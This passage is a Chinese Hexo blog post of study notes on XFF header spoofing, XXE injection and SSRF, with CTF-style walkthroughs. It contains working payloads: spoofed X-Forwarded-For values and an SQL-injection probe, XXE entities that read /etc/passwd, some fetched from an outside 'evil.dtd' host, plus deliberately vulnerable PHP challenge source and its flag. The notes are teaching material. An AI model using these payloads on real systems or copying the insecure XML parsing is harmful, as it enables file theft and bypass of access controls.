<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>漏洞 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="XFF漏洞（X-Forwarded-For）•什么是XFF漏洞*XFF是header请求头中的一个参数 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 代表了HTTP的请求端真实的IP。 12X-Forwarded-For: client1, proxy1, proxy2, proxy3&#x2F;&#x2F;浏览器IP，第一个代理服务器，">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞">
<meta property="og:url" content="http://ggken753.github.io/2020/11/17/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B06/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="XFF漏洞（X-Forwarded-For）•什么是XFF漏洞*XFF是header请求头中的一个参数 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 代表了HTTP的请求端真实的IP。 12X-Forwarded-For: client1, proxy1, proxy2, proxy3&#x2F;&#x2F;浏览器IP，第一个代理服务器，">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120104642871.png">
<meta property="og:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120105133282.png">
<meta property="og:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120135131233.png">
<meta property="og:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120142653285.png">
<meta property="og:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120215420079.png">
<meta property="og:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120215444639.png">
<meta property="article:published_time" content="2020-11-17T14:26:56.017Z">
<meta property="article:modified_time" content="2020-11-24T06:58:37.630Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120104642871.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://GGken753.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-学习笔记6" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/11/17/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B06/" class="article-date">
  <time datetime="2020-11-17T14:26:56.017Z" itemprop="datePublished">2020-11-17</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="XFF漏洞（X-Forwarded-For）"><a href="#XFF漏洞（X-Forwarded-For）" class="headerlink" title="XFF漏洞（X-Forwarded-For）"></a>XFF漏洞（X-Forwarded-For）</h2><h3 id="•什么是XFF漏洞"><a href="#•什么是XFF漏洞" class="headerlink" title="•什么是XFF漏洞"></a>•什么是XFF漏洞</h3><p>*XFF是header请求头中的一个参数<br> 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。<br> 代表了HTTP的请求端真实的IP。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: client1, proxy1, proxy2, proxy3</span><br><span class="line">&#x2F;&#x2F;浏览器IP，第一个代理服务器，第二个三个四个等等</span><br></pre></td></tr></table></figure>

<h3 id="•利用方法"><a href="#•利用方法" class="headerlink" title="•利用方法"></a>•利用方法</h3><h5 id="1-绕过服务器过滤"><a href="#1-绕过服务器过滤" class="headerlink" title="1.绕过服务器过滤"></a>1.绕过服务器过滤</h5><p>​         XFF漏洞也称为IP欺骗。<br> 有些服务器通过XFF头判断是否是本地服务器，当判断为本地服务器时，才能访问相关内容。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: 127.0.0.1</span><br><span class="line">X-Forwarded-For: 192.168.1.1</span><br></pre></td></tr></table></figure>

<p>修改XFF头的信息，即可绕过服务器的过滤。</p>
<h5 id="2-XFF导致sql注入"><a href="#2-XFF导致sql注入" class="headerlink" title="2.XFF导致sql注入"></a>2.XFF导致sql注入</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-for: 127.0.0.1&#39; and 1&#x3D;1#</span><br></pre></td></tr></table></figure>

<p>​        发现没有报错，证明存在注入点,然后进一步利用sql注入，进行渗透测试。</p>
<h5 id="3-其他服务器真实地址的参数"><a href="#3-其他服务器真实地址的参数" class="headerlink" title="3.其他服务器真实地址的参数"></a>3.其他服务器真实地址的参数</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">x-forwarded-fot</span><br><span class="line">x-remote-IP</span><br><span class="line">x-originating-IP</span><br><span class="line">x-remote-ip</span><br><span class="line">x-remote-addr</span><br><span class="line">x-client-IP</span><br><span class="line">x-client-ip</span><br><span class="line">x-Real-ip</span><br></pre></td></tr></table></figure>

<h5 id="4-例题"><a href="#4-例题" class="headerlink" title="4.例题"></a>4.例题</h5><p><a target="_blank" rel="noopener" href="http://47.98.234.232:28017/">http://47.98.234.232:28017/</a></p>
<p><img src="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120104642871.png"></p>
<p>用Burp Suite抓包 将use=0改为use=1;写入X-Forwarded-For对http进行绕过，得到flag</p>
<p><img src="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120105133282.png"></p>
<h2 id="XXF-XML-External-Entity-injection-XML-外部实体注入漏洞）"><a href="#XXF-XML-External-Entity-injection-XML-外部实体注入漏洞）" class="headerlink" title="XXF((XML External Entity injection)XML 外部实体注入漏洞）"></a>XXF((XML External Entity injection)XML 外部实体注入漏洞）</h2><h3 id="•什么是XXF漏洞"><a href="#•什么是XXF漏洞" class="headerlink" title="•什么是XXF漏洞"></a>•什么是XXF漏洞</h3><p>​        *如果XML 文件在引用外部实体时候，可以沟通构造恶意内容，可以导致读取任意文件，命令执行和对内网的攻击，这就是XXE漏洞</p>
<h3 id="•XML"><a href="#•XML" class="headerlink" title="•XML"></a>•XML</h3><h5 id="1-XML概念："><a href="#1-XML概念：" class="headerlink" title="1.XML概念："></a>1.<strong>XML概念：</strong></h5><p>​         XML是可扩展的标记语言（eXtensible Markup Language），设计用来进行数据的传输和存储， 结构是树形结构，有标签构成，这点很想HTML语言。但是XML和HTML有明显区别如下：<br>XML 被设计用来传输和存储数据。<br>HTML 被设计用来显示数据。</p>
<h5 id="2-XML结构"><a href="#2-XML结构" class="headerlink" title="2.XML结构:"></a>2.XML结构:</h5><p>​        来看一个简单的XML 文件结构， 第一行XML的声明，第二行<note> 为根元素， 下面的to, from,heading和body 都是子元素，构成了一个出色的自我描述性的结构：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?xml version&#x3D;&quot;1.0&quot; encoding&#x3D;&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line">&lt;to&gt;Tove&lt;&#x2F;to&gt;</span><br><span class="line">&lt;from&gt;Jani&lt;&#x2F;from&gt;</span><br><span class="line">&lt;heading&gt;Reminder&lt;&#x2F;heading&gt;</span><br><span class="line">&lt;body&gt;Don&#39;t forget me this weekend!&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;note&gt;</span><br></pre></td></tr></table></figure>

<h5 id="3-XML-DTD-（重点）"><a href="#3-XML-DTD-（重点）" class="headerlink" title="3.XML DTD （重点）"></a>3.XML DTD （重点）</h5><p>​         DTD全称为，Document Type Definition，中文翻译为文档类型定义，是一套为了进行程序间的数据交换而建立的关于标记符的语法规则。<br>​        文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 有两种声明的方法，一种是内部声明，一种是外部声明，我们下面开具体看一下：<br><strong>DTD的外部声明：</strong><br>外部需要一个DTD的文件，比如：note.dtc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot; encoding&#x3D;&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE note [</span><br><span class="line">&lt;!ELEMENT note (to,from,heading,body)&gt;</span><br><span class="line">&lt;!ELEMENT to (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT from (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT heading (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT body (#PCDATA)&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line">&lt;to&gt;Tove&lt;&#x2F;to&gt;</span><br><span class="line">&lt;from&gt;Jani&lt;&#x2F;from&gt;</span><br><span class="line">&lt;heading&gt;Reminder&lt;&#x2F;heading&gt;</span><br><span class="line">&lt;body&gt;Don&#39;t forget me this weekend!&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;note&gt;</span><br></pre></td></tr></table></figure>

<p><strong>DTD 的内部声明:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot; encoding&#x3D;&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line">&lt;!ENTITY content SYSTEM &quot;filename&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line"> &lt;note&gt;</span><br><span class="line">&lt;to&gt;Tove&lt;&#x2F;to&gt;</span><br><span class="line">&lt;from&gt;Jani&lt;&#x2F;from&gt;</span><br><span class="line">&lt;heading&gt;Reminder&lt;&#x2F;heading&gt;</span><br><span class="line">&lt;body&gt;Don&#39;t forget me this weekend!&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;note&gt;</span><br></pre></td></tr></table></figure>

<h3 id="•XXE漏洞成因"><a href="#•XXE漏洞成因" class="headerlink" title="•XXE漏洞成因"></a><strong>•XXE漏洞成因</strong></h3><p>​        XML数据在传输中数据被修改，服务器执行被恶意插入的代码，最终实现攻击的目的，XXE漏洞就是在XML在外部声明的时候出现了问题。看一下修改后的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line">&lt;!ENTITY content SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd&quot; # 直接读取系统的文件</span><br><span class="line">]&gt;</span><br><span class="line">&lt;note&gt;</span><br><span class="line">&lt;name&gt;&amp;content;&lt;&#x2F;name&gt;</span><br><span class="line">&lt;&#x2F;note&gt;</span><br></pre></td></tr></table></figure>

<h5 id="怎样构建外部实体注入："><a href="#怎样构建外部实体注入：" class="headerlink" title="怎样构建外部实体注入："></a><strong>怎样构建外部实体注入：</strong></h5><p><strong>（1）直接通过DTD外部实体声明</strong></p>
<p>XML内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line">&lt;!ENTITY content SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd&quot;&gt; </span><br><span class="line">]&gt;</span><br><span class="line">&lt;c&gt;&amp;b;&lt;&#x2F;c&gt;</span><br></pre></td></tr></table></figure>

<p><strong>（2）通过DTD文档引入外部DTD文档，再引入外部实体声明</strong></p>
<p>XML内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE a SYSTEM &quot;http:&#x2F;&#x2F;mark4z5.com&#x2F;evil.dtd&quot;&gt;</span><br><span class="line">&lt;c&gt;&amp;b;&lt;&#x2F;c&gt;</span><br></pre></td></tr></table></figure>

<p>DTD文件内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY b SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd&quot;&gt; </span><br></pre></td></tr></table></figure>

<p><strong>（3）通过DTD外部实体声明引入外部实体声明</strong></p>
<p>XML内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE a [</span><br><span class="line">   &lt;!ENTITY % d SYSTEM &quot;http:&#x2F;&#x2F;mark4z5.com&#x2F;evil.dtd&quot;&gt;</span><br><span class="line">   %d;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;c&gt;&amp;b;&lt;&#x2F;c&gt;</span><br></pre></td></tr></table></figure>

<p>DTD文件内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY b SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd&quot;&gt; </span><br></pre></td></tr></table></figure>

<h5 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h5><p>134.175.168.213:28100</p>
<p>查看页面源码</p>
<p><img src="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120135131233.png"></p>
<p>发现存在index.php文件</p>
<p>使用php伪协议读取index.php </p>
<p>使用Burp Suite进行抓包</p>
<p><img src="https://gitee.com/lin-ziyang/hexo/raw/master/image-20201120142653285.png"></p>
<p>得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PD9waHANCmxpYnhtbF9kaXNhYmxlX2VudGl0eV9sb2FkZXIoZmFsc2UpOw0KJGRhdGEgPSBAZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7DQokcmVzcCA9ICcnOw0KLy8kZmxhZz0nZmxhZ3s3OWQxMDYyNi1kMjdmLTQ1NjktYTYyOS1jOTYwNmQwMzc4ZjJ9JzsNCmlmKCRkYXRhICE9IGZhbHNlKXsNCiAgICAkZG9tID0gbmV3IERPTURvY3VtZW50KCk7DQogICAgJGRvbS0+bG9hZFhNTCgkZGF0YSwgTElCWE1MX05PRU5UKTsNCiAgICBvYl9zdGFydCgpOw0KICAgICRyZXMgID0gJGRvbS0+dGV4dENvbnRlbnQ7DQogICAgJHJlc3AgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICBpZiAoJHJlcyl7DQogICAgICAgIGRpZSgkcmVzKTsNCiAgICB9DQoNCn0NCj8+DQo8IURPQ1RZUEUgaHRtbD4NCjxodG1sIGxhbmc9ImVuIj4NCjxoZWFkPg0KICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCiAgICA8dGl0bGU+d2VsY29tZTwvdGl0bGU+DQogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIuL3N0eWxlLmNzcyI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iaWU9ZWRnZSI+DQoNCjwvaGVhZD4NCjxib2R5IGNsYXNzPSJjb250YWN0Qm9keSI+DQo8ZGl2IGNsYXNzPSJ3cmFwcGVyIj4NCiAgICA8ZGl2IGNsYXNzPSJ0aXRsZSI+DQoNCg0KICAgIDwvZGl2Pg0KDQoNCiAgICA8Zm9ybSBtZXRob2Q9InBvc3QiIGNsYXNzPSJmb3JtIj4NCiAgICAgICAgPGgxIGlkPSJ0aXRsZSI+6K+36L6T5YWl5aeT5ZCNPC9oMT4NCiAgICAgICAgPGJyLz4NCiAgICAgICAgPGJyLz4NCiAgICAgICAgPGJyLz4NCiAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIGNsYXNzPSJuYW1lIGVudHJ5ICIgaWQ9Im5hbWUiIG5hbWU9Im5hbWUiIHBsYWNlaG9sZGVyPSJZb3VyIE5hbWUiLz4NCiAgICA8L2Zvcm0+DQogICAgPGJ1dHRvbiBjbGFzcz0ic3VibWl0IGVudHJ5IiBvbmNsaWNrPSJmdW5jKCkiPlN1Ym1pdDwvYnV0dG9uPg0KDQogICAgPGRpdiBjbGFzcz0ic2hhZG93Ij48L2Rpdj4NCjwvZGl2Pg0KDQo8L2JvZHk+DQo8L2h0bWw+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQogICAgZnVuY3Rpb24gcGxheSgpIHsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCiAgICBmdW5jdGlvbiBmdW5jKCkgew0KICAgICAgICAvLyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgpLnZhbHVlDQogICAgICAgIHZhciB4bWwgPSAnJyArDQogICAgICAgICAgICAnPFw&#x2F;eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ilw&#x2F;PicgKw0KICAgICAgICAgICAgJzxmZWVkYmFjaz4nICsNCiAgICAgICAgICAgICc8YXV0aG9yPicgKyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbmFtZScpLnZhbHVlKyAnPC9hdXRob3I+JyArDQogICAgICAgICAgICAnPC9mZWVkYmFjaz4nOw0KICAgICAgICBjb25zb2xlLmxvZyh4bWwpOw0KICAgICAgICB2YXIgeG1saHR0cCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KICAgICAgICB4bWxodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uICgpIHsNCiAgICAgICAgICAgIGlmICh4bWxodHRwLnJlYWR5U3RhdGUgPT0gNCkgew0KICAgICAgICAgICAgICAgIC8vIGNvbnNvbGUubG9nKHhtbGh0dHAucmVhZHlTdGF0ZSk7DQogICAgICAgICAgICAgICAgLy8gY29uc29sZS5sb2coeG1saHR0cC5yZXNwb25zZVRleHQpOw0KICAgICAgICAgICAgICAgIHZhciByZXMgPSB4bWxodHRwLnJlc3BvbnNlVGV4dDsNCiAgICAgICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgndGl0bGUnKS50ZXh0Q29udGVudCA9IHJlcw0KICAgICAgICAgICAgfQ0KICAgICAgICB9Ow0KICAgICAgICB4bWxodHRwLm9wZW4oIlBPU1QiLCAiaW5kZXgucGhwIiwgdHJ1ZSk7DQogICAgICAgIHhtbGh0dHAuc2VuZCh4bWwpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfTsNCjwvc2NyaXB0Pg0KPC9ib2R5Pg0KPC9odG1sPg&#x3D;&#x3D;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>对获取的字符串进行base64解码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">libxml_disable_entity_loader(false);</span><br><span class="line">$data &#x3D; @file_get_contents(&#39;php:&#x2F;&#x2F;input&#39;);</span><br><span class="line">$resp &#x3D; &#39;&#39;;</span><br><span class="line">&#x2F;&#x2F;$flag&#x3D;&#39;flag&#123;79d10626-d27f-4569-a629-c9606d0378f2&#125;&#39;;</span><br><span class="line">if($data !&#x3D; false)&#123;</span><br><span class="line">    $dom &#x3D; new DOMDocument();</span><br><span class="line">    $dom-&gt;loadXML($data, LIBXML_NOENT);</span><br><span class="line">    ob_start();</span><br><span class="line">    $res  &#x3D; $dom-&gt;textContent;</span><br><span class="line">    $resp &#x3D; ob_get_contents();</span><br><span class="line">    ob_end_clean();</span><br><span class="line">    if ($res)&#123;</span><br><span class="line">        die($res);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang&#x3D;&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset&#x3D;&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;title&gt;welcome&lt;&#x2F;title&gt;</span><br><span class="line">    &lt;link rel&#x3D;&quot;stylesheet&quot; href&#x3D;&quot;.&#x2F;style.css&quot;&gt;</span><br><span class="line">    &lt;meta name&#x3D;&quot;viewport&quot; content&#x3D;&quot;width&#x3D;device-width, initial-scale&#x3D;1.0&quot;&gt;</span><br><span class="line">    &lt;meta http-equiv&#x3D;&quot;X-UA-Compatible&quot; content&#x3D;&quot;ie&#x3D;edge&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body class&#x3D;&quot;contactBody&quot;&gt;</span><br><span class="line">&lt;div class&#x3D;&quot;wrapper&quot;&gt;</span><br><span class="line">    &lt;div class&#x3D;&quot;title&quot;&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    &lt;&#x2F;div&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    &lt;form method&#x3D;&quot;post&quot; class&#x3D;&quot;form&quot;&gt;</span><br><span class="line">        &lt;h1 id&#x3D;&quot;title&quot;&gt;请输入姓名&lt;&#x2F;h1&gt;</span><br><span class="line">        &lt;br&#x2F;&gt;</span><br><span class="line">        &lt;br&#x2F;&gt;</span><br><span class="line">        &lt;br&#x2F;&gt;</span><br><span class="line">        &lt;input type&#x3D;&quot;text&quot; class&#x3D;&quot;name entry &quot; id&#x3D;&quot;name&quot; name&#x3D;&quot;name&quot; placeholder&#x3D;&quot;Your Name&quot;&#x2F;&gt;</span><br><span class="line">    &lt;&#x2F;form&gt;</span><br><span class="line">    &lt;button class&#x3D;&quot;submit entry&quot; onclick&#x3D;&quot;func()&quot;&gt;Submit&lt;&#x2F;button&gt;</span><br><span class="line"></span><br><span class="line">    &lt;div class&#x3D;&quot;shadow&quot;&gt;&lt;&#x2F;div&gt;</span><br><span class="line">&lt;&#x2F;div&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;script type&#x3D;&quot;text&#x2F;javascript&quot;&gt;</span><br><span class="line">    function play() &#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">    function func() &#123;</span><br><span class="line">        &#x2F;&#x2F; document.getElementById().value</span><br><span class="line">        var xml &#x3D; &#39;&#39; +</span><br><span class="line">            &#39;&lt;\?xml version&#x3D;&quot;1.0&quot; encoding&#x3D;&quot;UTF-8&quot;\?&gt;&#39; +</span><br><span class="line">            &#39;&lt;feedback&gt;&#39; +</span><br><span class="line">            &#39;&lt;author&gt;&#39; + document.getElementById(&#39;name&#39;).value+ &#39;&lt;&#x2F;author&gt;&#39; +</span><br><span class="line">            &#39;&lt;&#x2F;feedback&gt;&#39;;</span><br><span class="line">        console.log(xml);</span><br><span class="line">        var xmlhttp &#x3D; new XMLHttpRequest();</span><br><span class="line">        xmlhttp.onreadystatechange &#x3D; function () &#123;</span><br><span class="line">            if (xmlhttp.readyState &#x3D;&#x3D; 4) &#123;</span><br><span class="line">                &#x2F;&#x2F; console.log(xmlhttp.readyState);</span><br><span class="line">                &#x2F;&#x2F; console.log(xmlhttp.responseText);</span><br><span class="line">                var res &#x3D; xmlhttp.responseText;</span><br><span class="line">                document.getElementById(&#39;title&#39;).textContent &#x3D; res</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;;</span><br><span class="line">        xmlhttp.open(&quot;POST&quot;, &quot;index.php&quot;, true);</span><br><span class="line">        xmlhttp.send(xml);</span><br><span class="line">        return false;</span><br><span class="line">    &#125;;</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>

<p>得到源代码和flag.</p>
<h2 id="SSRF漏洞"><a href="#SSRF漏洞" class="headerlink" title="SSRF漏洞"></a>SSRF漏洞</h2><h3 id="•什么是SSRF漏洞"><a href="#•什么是SSRF漏洞" class="headerlink" title="•什么是SSRF漏洞"></a>•什么是SSRF漏洞</h3><p>​        ssrf(Sever-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造攻击链传给服务器，服务端执行并发起请求造成安全问题的漏洞，一般用来在外网探测或攻击内网服务。</p>
<h3 id="•怎么寻找存在SSRF漏洞"><a href="#•怎么寻找存在SSRF漏洞" class="headerlink" title="•怎么寻找存在SSRF漏洞"></a>•怎么寻找存在SSRF漏洞</h3><ul>
<li>分享：通过URL分享网页内容</li>
<li>转码服务：通过url地址把原地址的网页内容调优使得适合手机屏幕浏览</li>
<li>在线翻译：通过url地址翻译对应的文本内容，例如 百度 有道</li>
<li>图片加载与下载  通过url地址加载或者下载图片</li>
<li>图片、文章的收藏功能</li>
<li>未公开的api实现以及其他调用url的功能</li>
